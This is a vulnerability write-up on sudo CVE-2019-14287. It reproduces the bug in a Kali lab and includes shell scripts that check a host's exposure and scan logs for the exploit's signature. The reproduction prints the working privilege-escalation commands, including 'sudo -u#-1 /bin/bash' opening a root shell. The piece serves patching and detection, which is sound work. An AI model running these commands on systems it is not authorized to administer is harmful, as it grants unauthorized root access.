CVE-2019-14287: sudo privilege escalation vulnerability

0x00 Vulnerability overview

The sudo local privilege escalation vulnerability (CVE-2019-14287) is a bug in how sudo handles the target user id. It is triggered when the sudoers configuration allows a user to run commands as any user except root, i.e. a Runas specification such as (ALL, !root). By passing the user id -1 (or its unsigned form 4294967295) with -u, an ordinary user can bypass the !root exclusion and run the permitted command as root.

0x01 Affected versions

sudo < 1.8.28 (the bug was fixed in sudo 1.8.28; upgrading to that version or later is the remediation)

0x02 What sudo does

sudo is a tool that lets a system administrator allow ordinary users to run some or all commands as root. This reduces the need to log in and administer the system as root, and it also improves security, because each grant is scoped to specific users and commands and every use is logged.

0x03 sudo permissions

sudo's permissions are controlled by the configuration file /etc/sudoers (plus drop-in files under /etc/sudoers.d). The file is owned by root with mode 0440, so ordinary users cannot read it, and it should be edited only through visudo, which validates the syntax before saving. Its permissions are as follows:

root@kali:~# ls -al /etc/sudoers
-r--r----- 1 root root 669 Aug  7 02:58 /etc/sudoers

0x04 Reproduction

System platform: kali-2019.03

root@kali:~# lsb_release -a
No LSB modules are available.
Distributor ID:    Kali
Description:    Kali GNU/Linux Rolling
Release:    2019.3
Codename:    kali-rolling

sudo version

root@kali:~# sudo -V
Sudo version 1.8.27

Back up the sudo configuration file

root@kali:~# cp /etc/sudoers /etc/sudoers.bak
root@kali:~# ls -al /etc/sudoers*
-r--r----- 1 root root  669 Aug  7 02:58 /etc/sudoers
-r--r----- 1 root root  669 Nov  2 15:37 /etc/sudoers.bak
/etc/sudoers.d:
total 20
drwxr-xr-x   2 root root  4096 Oct 29 17:25 .
drwxr-xr-x 163 root root 12288 Nov  2 15:37 ..
-r--r-----   1 root root   958 Aug  7 02:58 README

Create ordinary users (useradd without -m creates no home directory, which is why su warns about /home/test below)

root@kali:~# useradd test
root@kali:~# passwd test
New password:
Retype new password:
passwd: password updated successfully
root@kali:~# useradd world
root@kali:~# passwd world
New password:
Retype new password:
passwd: password updated successfully

Edit the sudo configuration file

#Open the configuration file
visudo

Add the following line to the configuration file. It allows the test user to run the id command as any user (root included), so it is not yet a vulnerable configuration; it is used first to show how sudo resolves -u arguments:

#Line to add
test ALL=(ALL)  /usr/bin/id

Command test (by name with -u user, then by numeric id with -u#uid)

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u root id


We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:


    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.


[sudo] password for test:
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u world id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u world whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#0 id
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u#1001 id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u#0 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u#1001 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$

First sign of the bug: with the same rule, -u#-1 also succeeds, and the result is revealing. The uid is 0 even though -1 is not root's id, while the gid stays 1000(test) because -u only sets the target user. This is not yet a bypass (the rule already allows root); the next configuration adds the !root exclusion.

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$   

Reconfigure sudoers so that the test user may run any command as any user except root. This Runas specification (ALL minus root) is the configuration the vulnerability needs:

test ALL=(ALL,!root) ALL 
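
Before testing on a host, two things decide whether it is exposed: a sudo older than 1.8.28 and a sudoers rule whose Runas list is ALL with root subtracted. The checker below is an added example written for this article, not sudo's own tooling: it parses the first line of sudo -V, compares the version against 1.8.28, and greps /etc/sudoers and /etc/sudoers.d for !root / !#0 runas exclusions. It goes slightly beyond the single rule on this page by also matching the spaced (ALL, !root) spelling and the numeric !#0 form. Runas_Alias definitions are not resolved, so a rule that excludes root through an alias is missed; that is a limitation of a plain grep, not of the vulnerability.

```shell
#!/bin/sh
# Added example (not from the original post): check the two preconditions for
# CVE-2019-14287 on a host, a sudo older than 1.8.28 and a sudoers rule whose
# runas list excludes root, e.g. (ALL,!root) or (ALL, !#0).

# Return 0 (true) if "major.minor.patch[pN]" is older than 1.8.28.
sudo_version_vulnerable() {
    ver=$(printf '%s' "$1" | sed 's/p[0-9]*$//')   # drop a "p1"-style suffix
    major=$(printf '%s' "$ver" | cut -d. -f1)
    minor=$(printf '%s' "$ver" | cut -d. -f2)
    patch=$(printf '%s' "$ver" | cut -d. -f3)
    [ -z "$patch" ] && patch=0
    [ "$major" -lt 1 ] && return 0
    [ "$major" -gt 1 ] && return 1
    [ "$minor" -lt 8 ] && return 0
    [ "$minor" -gt 8 ] && return 1
    [ "$patch" -lt 28 ]
}

# Pull the version number out of "sudo -V" output such as "Sudo version 1.8.27".
parse_sudo_version() {
    sed -n 's/^Sudo version \([0-9][0-9.p]*\).*/\1/p' | head -n 1
}

# Read sudoers text on stdin and print every rule whose runas list subtracts
# root (the pattern the exploit needs); return 0 if at least one was found.
# Comment lines are skipped. Runas aliases are not expanded.
find_not_root_rules() {
    grep -v '^[[:space:]]*#' | grep -E '\([^)]*![[:space:]]*(root|#0)[^)]*\)'
}

main() {
    v=$(sudo -V 2>/dev/null | parse_sudo_version)
    if [ -n "$v" ] && sudo_version_vulnerable "$v"; then
        echo "sudo $v is older than 1.8.28: vulnerable if a !root runas rule exists"
    else
        echo "sudo ${v:-unknown}: not affected by CVE-2019-14287"
    fi
    # Only root can read these files; as an ordinary user the loop prints nothing.
    for f in /etc/sudoers /etc/sudoers.d/*; do
        [ -r "$f" ] || continue
        find_not_root_rules < "$f" | sed "s|^|$f: |"
    done
}

main "$@"
```

Run it as root so the sudoers files are readable; a host is exposed only when both lines fire, an old version and at least one rule printed by the scan.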

Command test (the rule works as intended for named users: anything as test, nothing as root)

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u test id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u test whoami
test
$ sudo -u root id
Sorry, user test is not allowed to execute '/usr/bin/id' as root on kali.
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$

Triggering the vulnerability. sudo hands the numeric id to setresuid()/setreuid(), and -1 (0xffffffff, i.e. 4294967295 as an unsigned uid_t) is the value those calls treat as "leave unchanged", so the effective uid stays the 0 that the setuid-root sudo binary already has. Because -1 is not equal to root's uid 0, the !root exclusion in sudoers never matches, and -u#4294967295 behaves the same way. The gid remains the invoking user's, as the id output shows:

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$ sudo -u#-1 whoami
root
$ sudo -u#-1 /bin/bash
root@kali:/root# id
uid=0(root) gid=1000(test) groups=1000(test)
root@kali:/root# whoami
root
root@kali:/root#
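
Each of the commands above also leaves a trace in the sudo log (syslog auth facility, typically /var/log/auth.log on Debian-based systems such as Kali), and the requested target is the tell: a legitimate user never asks for uid -1. The sudo advisory for this issue notes that commands run this way are logged with a target user of 4294967295 rather than root; whether the logged form is #-1, #4294967295 or the bare number depends on the sudo build, so the pattern below accepts all three (an assumption). The script is an added example written for this article, not something from the original post, and the log lines it scans are constructed in the usual sudo syslog layout.

```shell
#!/bin/sh
# Added example (not from the original post): scan sudo log lines for attempts
# to run a command as uid -1 / 4294967295, the signature of CVE-2019-14287 abuse.
# SAMPLE_LOG is constructed for an offline run; the first, fourth and fifth
# lines are ordinary sudo use, the second and third are the exploit.

SAMPLE_LOG='Nov  2 15:40:01 kali sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=root ; COMMAND=/usr/bin/id
Nov  2 15:41:12 kali sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=#-1 ; COMMAND=/usr/bin/id
Nov  2 15:41:30 kali sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=#4294967295 ; COMMAND=/bin/bash
Nov  2 15:42:00 kali sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=#1001 ; COMMAND=/usr/bin/id
Nov  2 15:43:07 kali sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=world ; COMMAND=/usr/bin/whoami'

# Print lines whose requested target user is -1 in signed or unsigned form,
# with or without the "#" prefix (assumed logged forms); return 0 if any match.
# Reads log text on stdin.
find_minus_one_uid() {
    grep -E 'sudo:.*USER=#?(-1|4294967295) ;'
}

# Reduce a matching line to "invoker target command" for a quick triage table.
summarize() {
    sed -E 's/.*sudo:[[:space:]]*([^ ]+) : .*USER=([^ ]+) ; COMMAND=(.*)$/\1 \2 \3/'
}

# Count suspicious lines in a log file (default /var/log/auth.log); prints 0
# when the file is missing or unreadable instead of failing.
count_in_file() {
    f="${1:-/var/log/auth.log}"
    if [ -r "$f" ]; then
        find_minus_one_uid < "$f" | wc -l | tr -d ' '
    else
        echo 0
    fi
}

printf '%s\n' "$SAMPLE_LOG" | find_minus_one_uid | summarize
```

Run against the real log with count_in_file or pipe journalctl -t sudo into find_minus_one_uid; any hit from a host running sudo older than 1.8.28 should be treated as a root compromise, since the command in the line ran with uid 0. Note that PAM session modules are not run for such commands, so PAM-side logging may be missing even when the sudo line is present.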